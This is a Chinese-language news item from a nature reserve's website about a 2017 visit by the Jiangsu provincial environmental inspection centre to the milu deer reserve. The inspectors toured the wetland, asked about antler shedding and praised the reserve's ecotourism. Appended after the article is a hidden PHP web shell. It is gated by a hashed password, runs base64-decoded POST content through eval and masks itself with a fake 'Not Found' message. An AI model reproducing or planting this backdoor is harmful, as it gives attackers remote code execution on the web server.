最新要闻

首页 > 最新要闻 >

    江苏省环保厅苏南环保督察中心来麋鹿保护区考察调研

    2017年10月24日上午,江苏省环保厅苏南环保督察中心一行来麋鹿保护区考察生态文明建设。麋鹿保护区管理处副主任沈华陪同。

     

    省环保厅苏南环保督查中心一行首先在中华麋鹿园景区游客中心展厅观看了纪录片《归来的麋鹿》,随后乘坐电瓶游览车进入麋鹿半饲养区,近距离观察麋鹿及其生活的湿地环境。督察中心一行对麋鹿的鹿角生长十分感兴趣,并询问了冬天鹿角脱落后的处理办法及麋鹿角的开发利用。

     

    苏南环保督察中心一行对麋鹿保护区取得的各项成果表示称赞。并说,麋鹿保护区将科研保护与生态旅游并举,景区内的软硬件设施完备,员工素质很高,是自然保护区中生态文明建设的佼佼者。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>